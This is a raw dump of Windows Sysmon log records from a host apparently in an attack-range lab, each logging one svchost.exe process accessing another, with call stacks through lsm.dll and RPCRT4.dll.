09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23e0b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 